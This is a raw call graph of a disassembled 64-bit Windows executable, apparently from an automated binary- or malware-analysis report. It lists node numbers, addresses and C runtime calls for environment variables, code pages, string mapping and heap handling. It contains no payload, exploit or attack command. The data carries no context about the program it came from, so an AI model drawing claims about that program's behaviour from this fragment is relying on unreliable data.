7ff6aba56af6 20632->20635 20633->20635 20634->20635 20635->20571 20637 7ff6aba568fc 20636->20637 20638 7ff6aba56909 FileTimeToSystemTime 20636->20638 20637->20638 20640 7ff6aba56904 20637->20640 20639 7ff6aba5691d SystemTimeToTzSpecificLocalTime 20638->20639 20638->20640 20639->20640 20641 7ff6aba4bb10 _log10_special 8 API calls 20640->20641 20642 7ff6aba567f5 20641->20642 20642->20592 20644 7ff6aba609c5 20643->20644 20645 7ff6aba609a1 20643->20645 20648 7ff6aba609ff 20644->20648 20649 7ff6aba60a1e 20644->20649 20645->20644 20646 7ff6aba609a6 20645->20646 20647 7ff6aba55e48 _get_daylight 11 API calls 20646->20647 20650 7ff6aba609ab 20647->20650 20651 7ff6aba55e48 _get_daylight 11 API calls 20648->20651 20652 7ff6aba55e8c 45 API calls 20649->20652 20653 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20650->20653 20654 7ff6aba60a04 20651->20654 20659 7ff6aba60a2b 20652->20659 20656 7ff6aba609b6 20653->20656 20655 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20654->20655 20657 7ff6aba60a0f 20655->20657 20656->20622 20657->20622 20658 7ff6aba6174c 51 API calls 20658->20659 20659->20657 20659->20658 21157 7ff6aba6be53 21158 7ff6aba6be63 21157->21158 21161 7ff6aba562e8 LeaveCriticalSection 21158->21161 20771 7ff6aba5acd0 20774 7ff6aba5ac48 20771->20774 20781 7ff6aba61548 EnterCriticalSection 20774->20781 20782 7ff6aba5bed0 20783 7ff6aba5bed5 20782->20783 20784 7ff6aba5beea 20782->20784 20788 7ff6aba5bef0 20783->20788 20789 7ff6aba5bf32 20788->20789 20790 7ff6aba5bf3a 20788->20790 20791 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20789->20791 20792 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20790->20792 20791->20790 20793 7ff6aba5bf47 20792->20793 20794 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20793->20794 20795 7ff6aba5bf54 20794->20795 20796 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20795->20796 20797 7ff6aba5bf61 20796->20797 20798 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20797->20798 20799 7ff6aba5bf6e 20798->20799 20800 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20799->20800 20801 7ff6aba5bf7b 20800->20801 20802 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20801->20802 20803 7ff6aba5bf88 20802->20803 20804 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20803->20804 20805 7ff6aba5bf95 20804->20805 20806 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20805->20806 20807 7ff6aba5bfa5 20806->20807 20808 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20807->20808 20809 7ff6aba5bfb5 20808->20809 20814 7ff6aba5bd9c 20809->20814 20828 7ff6aba61548 EnterCriticalSection 20814->20828 20830 7ff6aba626d0 20848 7ff6aba61548 EnterCriticalSection 20830->20848 19972 7ff6aba61b38 19973 7ff6aba61b5c 19972->19973 19977 7ff6aba61b6c 19972->19977 19974 7ff6aba55e48 _get_daylight 11 API calls 19973->19974 19975 7ff6aba61b61 19974->19975 19976 7ff6aba61e4c 19979 7ff6aba55e48 _get_daylight 11 API calls 19976->19979 19977->19976 19978 7ff6aba61b8e 19977->19978 19980 7ff6aba61baf 19978->19980 20103 7ff6aba621f4 19978->20103 19981 7ff6aba61e51 19979->19981 19984 7ff6aba61c21 19980->19984 19986 7ff6aba61bd5 19980->19986 19990 7ff6aba61c15 19980->19990 19983 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19981->19983 19983->19975 19988 7ff6aba5fe04 _get_daylight 11 API calls 19984->19988 20003 7ff6aba61be4 19984->20003 19985 7ff6aba61cce 19997 7ff6aba61ceb 19985->19997 20004 7ff6aba61d3d 19985->20004 20118 7ff6aba5a5fc 19986->20118 19991 7ff6aba61c37 19988->19991 19990->19985 19990->20003 20124 7ff6aba6839c 19990->20124 19994 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19991->19994 19993 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19993->19975 19999 7ff6aba61c45 19994->19999 19995 7ff6aba61bfd 19995->19990 20002 7ff6aba621f4 45 API calls 19995->20002 19996 7ff6aba61bdf 20000 7ff6aba55e48 _get_daylight 11 API calls 19996->20000 19998 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19997->19998 20001 7ff6aba61cf4 19998->20001 19999->19990 19999->20003 20007 7ff6aba5fe04 _get_daylight 11 API calls 19999->20007 20000->20003 20017 7ff6aba61cf9 20001->20017 20160 7ff6aba6464c 20001->20160 20002->19990 20003->19993 20004->20003 20005 7ff6aba6464c 40 API calls 20004->20005 20006 7ff6aba61d7a 20005->20006 20008 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20006->20008 20010 7ff6aba61c67 20007->20010 20011 7ff6aba61d84 20008->20011 20014 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20010->20014 20011->20003 20011->20017 20012 7ff6aba61e40 20015 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20012->20015 20013 7ff6aba61d25 20016 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20013->20016 20014->19990 20015->19975 20016->20017 20017->20012 20018 7ff6aba5fe04 _get_daylight 11 API calls 20017->20018 20019 7ff6aba61dc8 20018->20019 20020 7ff6aba61dd9 20019->20020 20021 7ff6aba61dd0 20019->20021 20022 7ff6aba5b3ac __std_exception_copy 37 API calls 20020->20022 20023 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20021->20023 20024 7ff6aba61de8 20022->20024 20025 7ff6aba61dd7 20023->20025 20026 7ff6aba61e7b 20024->20026 20027 7ff6aba61df0 20024->20027 20030 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20025->20030 20029 7ff6aba5b844 _isindst 17 API calls 20026->20029 20169 7ff6aba684b4 20027->20169 20032 7ff6aba61e8f 20029->20032 20030->19975 20035 7ff6aba61eb8 20032->20035 20041 7ff6aba61ec8 20032->20041 20033 7ff6aba61e17 20036 7ff6aba55e48 _get_daylight 11 API calls 20033->20036 20034 7ff6aba61e38 20038 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20034->20038 20037 7ff6aba55e48 _get_daylight 11 API calls 20035->20037 20039 7ff6aba61e1c 20036->20039 20062 7ff6aba61ebd 20037->20062 20038->20012 20042 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20039->20042 20040 7ff6aba621ab 20044 7ff6aba55e48 _get_daylight 11 API calls 20040->20044 20041->20040 20043 7ff6aba61eea 20041->20043 20042->20025 20045 7ff6aba61f07 20043->20045 20188 7ff6aba622dc 20043->20188 20046 7ff6aba621b0 20044->20046 20049 7ff6aba61f7b 20045->20049 20051 7ff6aba61f2f 20045->20051 20057 7ff6aba61f6f 20045->20057 20048 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20046->20048 20048->20062 20053 7ff6aba61fa3 20049->20053 20058 7ff6aba5fe04 _get_daylight 11 API calls 20049->20058 20073 7ff6aba61f3e 20049->20073 20050 7ff6aba6202e 20061 7ff6aba6204b 20050->20061 20070 7ff6aba6209e 20050->20070 20203 7ff6aba5a638 20051->20203 20055 7ff6aba5fe04 _get_daylight 11 API calls 20053->20055 20053->20057 20053->20073 20060 7ff6aba61fc5 20055->20060 20056 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20056->20062 20057->20050 20057->20073 20209 7ff6aba6825c 20057->20209 20063 7ff6aba61f95 20058->20063 20066 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20060->20066 20067 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20061->20067 20068 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20063->20068 20064 7ff6aba61f57 20064->20057 20072 7ff6aba622dc 45 API calls 20064->20072 20065 7ff6aba61f39 20069 7ff6aba55e48 _get_daylight 11 API calls 20065->20069 20066->20057 20071 7ff6aba62054 20067->20071 20068->20053 20069->20073 20070->20073 20074 7ff6aba6464c 40 API calls 20070->20074 20077 7ff6aba6464c 40 API calls 20071->20077 20079 7ff6aba6205a 20071->20079 20072->20057 20073->20056 20075 7ff6aba620dc 20074->20075 20076 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20075->20076 20078 7ff6aba620e6 20076->20078 20081 7ff6aba62086 20077->20081 20078->20073 20078->20079 20080 7ff6aba6219f 20079->20080 20084 7ff6aba5fe04 _get_daylight 11 API calls 20079->20084 20082 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20080->20082 20083 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20081->20083 20082->20062 20083->20079 20085 7ff6aba6212b 20084->20085 20086 7ff6aba6213c 20085->20086 20087 7ff6aba62133 20085->20087 20088 7ff6aba616e4 37 API calls 20086->20088 20089 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20087->20089 20091 7ff6aba6214a 20088->20091 20090 7ff6aba6213a 20089->20090 20097 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20090->20097 20092 7ff6aba62152 SetEnvironmentVariableW 20091->20092 20093 7ff6aba621df 20091->20093 20094 7ff6aba62197 20092->20094 20095 7ff6aba62176 20092->20095 20096 7ff6aba5b844 _isindst 17 API calls 20093->20096 20100 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20094->20100 20098 7ff6aba55e48 _get_daylight 11 API calls 20095->20098 20099 7ff6aba621f3 20096->20099 20097->20062 20101 7ff6aba6217b 20098->20101 20100->20080 20102 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20101->20102 20102->20090 20104 7ff6aba62229 20103->20104 20110 7ff6aba62211 20103->20110 20105 7ff6aba5fe04 _get_daylight 11 API calls 20104->20105 20113 7ff6aba6224d 20105->20113 20106 7ff6aba5b40c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20108 7ff6aba622d8 20106->20108 20107 7ff6aba622ae 20109 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20107->20109 20109->20110 20110->19980 20111 7ff6aba5fe04 _get_daylight 11 API calls 20111->20113 20112 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20112->20113 20113->20107 20113->20111 20113->20112 20114 7ff6aba5b3ac __std_exception_copy 37 API calls 20113->20114 20115 7ff6aba622bd 20113->20115 20117 7ff6aba622d2 20113->20117 20114->20113 20116 7ff6aba5b844 _isindst 17 API calls 20115->20116 20116->20117 20117->20106 20119 7ff6aba5a60c 20118->20119 20122 7ff6aba5a615 20118->20122 20119->20122 20233 7ff6aba5a0d4 20119->20233 20122->19995 20122->19996 20125 7ff6aba683a9 20124->20125 20126 7ff6aba674c4 20124->20126 20128 7ff6aba55e8c 45 API calls 20125->20128 20127 7ff6aba674d1 20126->20127 20134 7ff6aba67507 20126->20134 20129 7ff6aba55e48 _get_daylight 11 API calls 20127->20129 20147 7ff6aba67478 20127->20147 20131 7ff6aba683dd 20128->20131 20132 7ff6aba674db 20129->20132 20130 7ff6aba67531 20133 7ff6aba55e48 _get_daylight 11 API calls 20130->20133 20135 7ff6aba683e2 20131->20135 20136 7ff6aba683f3 20131->20136 20140 7ff6aba6840a 20131->20140 20137 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20132->20137 20138 7ff6aba67536 20133->20138 20134->20130 20139 7ff6aba67556 20134->20139 20135->19990 20141 7ff6aba55e48 _get_daylight 11 API calls 20136->20141 20142 7ff6aba674e6 20137->20142 20143 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20138->20143 20148 7ff6aba55e8c 45 API calls 20139->20148 20153 7ff6aba67541 20139->20153 20145 7ff6aba68426 20140->20145 20146 7ff6aba68414 20140->20146 20144 7ff6aba683f8 20141->20144 20142->19990 20143->20153 20149 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20144->20149 20151 7ff6aba68437 20145->20151 20152 7ff6aba6844e 20145->20152 20150 7ff6aba55e48 _get_daylight 11 API calls 20146->20150 20147->19990 20148->20153 20149->20135 20155 7ff6aba68419 20150->20155 20450 7ff6aba67514 20151->20450 20459 7ff6aba6a1bc 20152->20459 20153->19990 20158 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20155->20158 20158->20135 20159 7ff6aba55e48 _get_daylight 11 API calls 20159->20135 20161 7ff6aba6468b 20160->20161 20162 7ff6aba6466e 20160->20162 20164 7ff6aba64695 20161->20164 20499 7ff6aba68ea8 20161->20499 20162->20161 20163 7ff6aba6467c 20162->20163 20165 7ff6aba55e48 _get_daylight 11 API calls 20163->20165 20506 7ff6aba68ee4 20164->20506 20168 7ff6aba64681 memcpy_s 20165->20168 20168->20013 20170 7ff6aba55e8c 45 API calls 20169->20170 20171 7ff6aba6851a 20170->20171 20173 7ff6aba68528 20171->20173 20518 7ff6aba60190 20171->20518 20521 7ff6aba56468 20173->20521 20176 7ff6aba68614 20178 7ff6aba68625 20176->20178 20180 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20176->20180 20177 7ff6aba55e8c 45 API calls 20179 7ff6aba68597 20177->20179 20181 7ff6aba61e13 20178->20181 20183 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20178->20183 20182 7ff6aba60190 5 API calls 20179->20182 20186 7ff6aba685a0 20179->20186 20180->20178 20181->20033 20181->20034 20182->20186 20183->20181 20184 7ff6aba56468 14 API calls 20185 7ff6aba685fb 20184->20185 20185->20176 20187 7ff6aba68603 SetEnvironmentVariableW 20185->20187 20186->20184 20187->20176 20189 7ff6aba6231c 20188->20189 20190 7ff6aba622ff 20188->20190 20191 7ff6aba5fe04 _get_daylight 11 API calls 20189->20191 20190->20045 20197 7ff6aba62340 20191->20197 20192 7ff6aba623a1 20194 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20192->20194 20193 7ff6aba5b40c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20195 7ff6aba623ca 20193->20195 20194->20190 20196 7ff6aba5fe04 _get_daylight 11 API calls 20196->20197 20197->20192 20197->20196 20198 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20197->20198 20199 7ff6aba616e4 37 API calls 20197->20199 20200 7ff6aba623b0 20197->20200 20202 7ff6aba623c4 20197->20202 20198->20197 20199->20197 20201 7ff6aba5b844 _isindst 17 API calls 20200->20201 20201->20202 20202->20193 20204 7ff6aba5a648 20203->20204 20205 7ff6aba5a651 20203->20205 20204->20205 20206 7ff6aba5a148 40 API calls 20204->20206 20205->20064 20205->20065 20207 7ff6aba5a65a 20206->20207 20207->20205 20208 7ff6aba5a508 12 API calls 20207->20208 20208->20205 20210 7ff6aba68269 20209->20210 20215 7ff6aba68296 20209->20215 20211 7ff6aba6826e 20210->20211 20210->20215 20212 7ff6aba55e48 _get_daylight 11 API calls 20211->20212 20213 7ff6aba68273 20212->20213 20216 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20213->20216 20214 7ff6aba682da 20218 7ff6aba55e48 _get_daylight 11 API calls 20214->20218 20215->20214 20217 7ff6aba682f9 20215->20217 20231 7ff6aba682ce __crtLCMapStringW 20215->20231 20219 7ff6aba6827e 20216->20219 20220 7ff6aba68315 20217->20220 20221 7ff6aba68303 20217->20221 20222 7ff6aba682df 20218->20222 20219->20057 20224 7ff6aba55e8c 45 API calls 20220->20224 20223 7ff6aba55e48 _get_daylight 11 API calls 20221->20223 20225 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20222->20225 20226 7ff6aba68308 20223->20226 20227 7ff6aba68322 20224->20227 20225->20231 20228 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20226->20228 20227->20231 20543 7ff6aba69d78 20227->20543 20228->20231 20231->20057 20232 7ff6aba55e48 _get_daylight 11 API calls 20232->20231 20234 7ff6aba5a0ed 20233->20234 20243 7ff6aba5a0e9 20233->20243 20256 7ff6aba63860 20234->20256 20239 7ff6aba5a10b 20282 7ff6aba5a1b8 20239->20282 20240 7ff6aba5a0ff 20241 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20240->20241 20241->20243 20243->20122 20248 7ff6aba5a428 20243->20248 20245 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20246 7ff6aba5a132 20245->20246 20247 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20246->20247 20247->20243 20249 7ff6aba5a451 20248->20249 20253 7ff6aba5a46a 20248->20253 20249->20122 20250 7ff6aba61a58 WideCharToMultiByte 20250->20253 20251 7ff6aba5fe04 _get_daylight 11 API calls 20251->20253 20252 7ff6aba5a4fa 20254 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20252->20254 20253->20249 20253->20250 20253->20251 20253->20252 20255 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20253->20255 20254->20249 20255->20253 20257 7ff6aba6386d 20256->20257 20258 7ff6aba5a0f2 20256->20258 20301 7ff6aba5c124 20257->20301 20262 7ff6aba63b9c GetEnvironmentStringsW 20258->20262 20263 7ff6aba63bcc 20262->20263 20264 7ff6aba5a0f7 20262->20264 20265 7ff6aba61a58 WideCharToMultiByte 20263->20265 20264->20239 20264->20240 20267 7ff6aba63c1d 20265->20267 20266 7ff6aba63c24 FreeEnvironmentStringsW 20266->20264 20267->20266 20268 7ff6aba5e6c4 _fread_nolock 12 API calls 20267->20268 20269 7ff6aba63c37 20268->20269 20270 7ff6aba63c48 20269->20270 20271 7ff6aba63c3f 20269->20271 20273 7ff6aba61a58 WideCharToMultiByte 20270->20273 20272 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20271->20272 20274 7ff6aba63c46 20272->20274 20275 7ff6aba63c6b 20273->20275 20274->20266 20276 7ff6aba63c79 20275->20276 20277 7ff6aba63c6f 20275->20277 20279 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20276->20279 20278 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20277->20278 20280 7ff6aba63c77 FreeEnvironmentStringsW 20278->20280 20279->20280 20280->20264 20283 7ff6aba5a1dd 20282->20283 20284 7ff6aba5fe04 _get_daylight 11 API calls 20283->20284 20295 7ff6aba5a213 20284->20295 20285 7ff6aba5a21b 20286 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20285->20286 20287 7ff6aba5a113 20286->20287 20287->20245 20288 7ff6aba5a28e 20289 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20288->20289 20289->20287 20290 7ff6aba5fe04 _get_daylight 11 API calls 20290->20295 20291 7ff6aba5a27d 20292 7ff6aba5a3e4 11 API calls 20291->20292 20294 7ff6aba5a285 20292->20294 20293 7ff6aba5b3ac __std_exception_copy 37 API calls 20293->20295 20297 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20294->20297 20295->20285 20295->20288 20295->20290 20295->20291 20295->20293 20296 7ff6aba5a2b3 20295->20296 20298 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20295->20298 20299 7ff6aba5b844 _isindst 17 API calls 20296->20299 20297->20285 20298->20295 20300 7ff6aba5a2c6 20299->20300 20302 7ff6aba5c135 FlsGetValue 20301->20302 20303 7ff6aba5c150 FlsSetValue 20301->20303 20304 7ff6aba5c14a 20302->20304 20319 7ff6aba5c142 20302->20319 20305 7ff6aba5c15d 20303->20305 20303->20319 20304->20303 20308 7ff6aba5fe04 _get_daylight 11 API calls 20305->20308 20306 7ff6aba5c148 20321 7ff6aba63534 20306->20321 20307 7ff6aba5b40c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20309 7ff6aba5c1c5 20307->20309 20310 7ff6aba5c16c 20308->20310 20311 7ff6aba5c18a FlsSetValue 20310->20311 20312 7ff6aba5c17a FlsSetValue 20310->20312 20313 7ff6aba5c196 FlsSetValue 20311->20313 20314 7ff6aba5c1a8 20311->20314 20315 7ff6aba5c183 20312->20315 20313->20315 20316 7ff6aba5bdfc _get_daylight 11 API calls 20314->20316 20317 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20315->20317 20318 7ff6aba5c1b0 20316->20318 20317->20319 20320 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20318->20320 20319->20306 20319->20307 20320->20306 20344 7ff6aba637a4 20321->20344 20323 7ff6aba63569 20359 7ff6aba63234 20323->20359 20326 7ff6aba5e6c4 _fread_nolock 12 API calls 20327 7ff6aba63597 20326->20327 20328 7ff6aba6359f 20327->20328 20331 7ff6aba635ae 20327->20331 20329 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20328->20329 20330 7ff6aba63586 20329->20330 20330->20258 20366 7ff6aba638dc 20331->20366 20334 7ff6aba636aa 20335 7ff6aba55e48 _get_daylight 11 API calls 20334->20335 20337 7ff6aba636af 20335->20337 20336 7ff6aba63705 20339 7ff6aba6376c 20336->20339 20377 7ff6aba63064 20336->20377 20340 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20337->20340 20338 7ff6aba636c4 20338->20336 20341 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20338->20341 20343 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20339->20343 20340->20330 20341->20336 20343->20330 20345 7ff6aba637c7 20344->20345 20347 7ff6aba637d1 20345->20347 20392 7ff6aba61548 EnterCriticalSection 20345->20392 20348 7ff6aba63843 20347->20348 20352 7ff6aba5b40c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20347->20352 20348->20323 20353 7ff6aba6385b 20352->20353 20354 7ff6aba638b2 20353->20354 20356 7ff6aba5c124 50 API calls 20353->20356 20354->20323 20357 7ff6aba6389c 20356->20357 20358 7ff6aba63534 65 API calls 20357->20358 20358->20354 20360 7ff6aba55e8c 45 API calls 20359->20360 20361 7ff6aba63248 20360->20361 20362 7ff6aba63266 20361->20362 20363 7ff6aba63254 GetOEMCP 20361->20363 20364 7ff6aba6326b GetACP 20362->20364 20365 7ff6aba6327b 20362->20365 20363->20365 20364->20365 20365->20326 20365->20330 20367 7ff6aba63234 47 API calls 20366->20367 20368 7ff6aba63909 20367->20368 20369 7ff6aba63a5f 20368->20369 20371 7ff6aba63946 IsValidCodePage 20368->20371 20376 7ff6aba63960 memcpy_s 20368->20376 20370 7ff6aba4bb10 _log10_special 8 API calls 20369->20370 20372 7ff6aba636a1 20370->20372 20371->20369 20373 7ff6aba63957 20371->20373 20372->20334 20372->20338 20374 7ff6aba63986 GetCPInfo 20373->20374 20373->20376 20374->20369 20374->20376 20393 7ff6aba6334c 20376->20393 20449 7ff6aba61548 EnterCriticalSection 20377->20449 20394 7ff6aba63389 GetCPInfo 20393->20394 20395 7ff6aba6347f 20393->20395 20394->20395 20401 7ff6aba6339c 20394->20401 20396 7ff6aba4bb10 _log10_special 8 API calls 20395->20396 20398 7ff6aba6351e 20396->20398 20397 7ff6aba640b0 48 API calls 20399 7ff6aba63413 20397->20399 20398->20369 20404 7ff6aba68df4 20399->20404 20401->20397 20403 7ff6aba68df4 54 API calls 20403->20395 20405 7ff6aba55e8c 45 API calls 20404->20405 20406 7ff6aba68e19 20405->20406 20409 7ff6aba68ac0 20406->20409 20410 7ff6aba68b01 20409->20410 20411 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20410->20411 20412 7ff6aba68b4b 20411->20412 20415 7ff6aba68c81 20412->20415 20416 7ff6aba68dc9 20412->20416 20417 7ff6aba5e6c4 _fread_nolock 12 API calls 20412->20417 20419 7ff6aba68b83 20412->20419 20413 7ff6aba4bb10 _log10_special 8 API calls 20414 7ff6aba63446 20413->20414 20414->20403 20415->20416 20418 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20415->20418 20416->20413 20417->20419 20418->20416 20419->20415 20420 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20419->20420 20421 7ff6aba68bf6 20420->20421 20421->20415 20440 7ff6aba60350 20421->20440 20424 7ff6aba68c92 20426 7ff6aba5e6c4 _fread_nolock 12 API calls 20424->20426 20428 7ff6aba68d64 20424->20428 20429 7ff6aba68cb0 20424->20429 20425 7ff6aba68c41 20425->20415 20427 7ff6aba60350 __crtLCMapStringW 6 API calls 20425->20427 20426->20429 20427->20415 20428->20415 20430 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20428->20430 20429->20415 20431 7ff6aba60350 __crtLCMapStringW 6 API calls 20429->20431 20430->20415 20432 7ff6aba68d30 20431->20432 20432->20428 20433 7ff6aba68d66 20432->20433 20434 7ff6aba68d50 20432->20434 20436 7ff6aba61a58 WideCharToMultiByte 20433->20436 20435 7ff6aba61a58 WideCharToMultiByte 20434->20435 20437 7ff6aba68d5e 20435->20437 20436->20437 20437->20428 20438 7ff6aba68d7e 20437->20438 20438->20415 20439 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20438->20439 20439->20415 20441 7ff6aba5ff7c __crtLCMapStringW 5 API calls 20440->20441 20442 7ff6aba6038e 20441->20442 20445 7ff6aba60396 20442->20445 20446 7ff6aba6043c 20442->20446 20444 7ff6aba603ff LCMapStringW 20444->20445 20445->20415 20445->20424 20445->20425 20447 7ff6aba5ff7c __crtLCMapStringW 5 API calls 20446->20447 20448 7ff6aba6046a __crtLCMapStringW 20447->20448 20448->20444 20451 7ff6aba67548 20450->20451 20452 7ff6aba67531 20450->20452 20451->20452 20455 7ff6aba67556 20451->20455 20453 7ff6aba55e48 _get_daylight 11 API calls 20452->20453 20454 7ff6aba67536 20453->20454 20456 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20454->20456 20457 7ff6aba55e8c 45 API calls 20455->20457 20458 7ff6aba67541 20455->20458 20456->20458 20457->20458 20458->20135 20460 7ff6aba55e8c 45 API calls 20459->20460 20461 7ff6aba6a1e1 20460->20461 20464 7ff6aba69e38 20461->20464 20466 7ff6aba69e86 20464->20466 20465 7ff6aba4bb10 _log10_special 8 API calls 20467 7ff6aba68475 20465->20467 20468 7ff6aba69f0d 20466->20468 20470 7ff6aba69ef8 GetCPInfo 20466->20470 20491 7ff6aba69f11 20466->20491 20467->20135 20467->20159 20469 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20468->20469 20468->20491 20472 7ff6aba69fa5 20469->20472 20470->20468 20470->20491 20471 7ff6aba69fdc 20474 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20471->20474 20471->20491 20472->20471 20473 7ff6aba5e6c4 _fread_nolock 12 API calls 20472->20473 20472->20491 20473->20471 20475 7ff6aba6a04a 20474->20475 20476 7ff6aba6a12c 20475->20476 20477 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20475->20477 20478 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20476->20478 20476->20491 20479 7ff6aba6a070 20477->20479 20478->20491 20479->20476 20480 7ff6aba5e6c4 _fread_nolock 12 API calls 20479->20480 20481 7ff6aba6a09d 20479->20481 20480->20481 20481->20476 20482 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20481->20482 20483 7ff6aba6a114 20482->20483 20484 7ff6aba6a11a 20483->20484 20485 7ff6aba6a134 20483->20485 20484->20476 20488 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20484->20488 20493 7ff6aba601d4 20485->20493 20488->20476 20489 7ff6aba6a173 20489->20491 20492 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20489->20492 20490 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20490->20489 20491->20465 20492->20491 20494 7ff6aba5ff7c __crtLCMapStringW 5 API calls 20493->20494 20495 7ff6aba60212 20494->20495 20496 7ff6aba6021a 20495->20496 20497 7ff6aba6043c __crtLCMapStringW 5 API calls 20495->20497 20496->20489 20496->20490 20498 7ff6aba60283 CompareStringW 20497->20498 20498->20496 20500 7ff6aba68eca HeapSize 20499->20500 20501 7ff6aba68eb1 20499->20501 20502 7ff6aba55e48 _get_daylight 11 API calls 20501->20502 20503 7ff6aba68eb6 20502->20503 20504 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20503->20504 20505 7ff6aba68ec1 20504->20505 20505->20164 20507 7ff6aba68ef9 20506->20507 20508 7ff6aba68f03 20506->20508 20509 7ff6aba5e6c4 _fread_nolock 12 API calls 20507->20509 20510 7ff6aba68f08 20508->20510 20516 7ff6aba68f0f _get_daylight 20508->20516 20514 7ff6aba68f01 20509->20514 20511 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20510->20511 20511->20514 20512 7ff6aba68f15 20515 7ff6aba55e48 _get_daylight 11 API calls 20512->20515 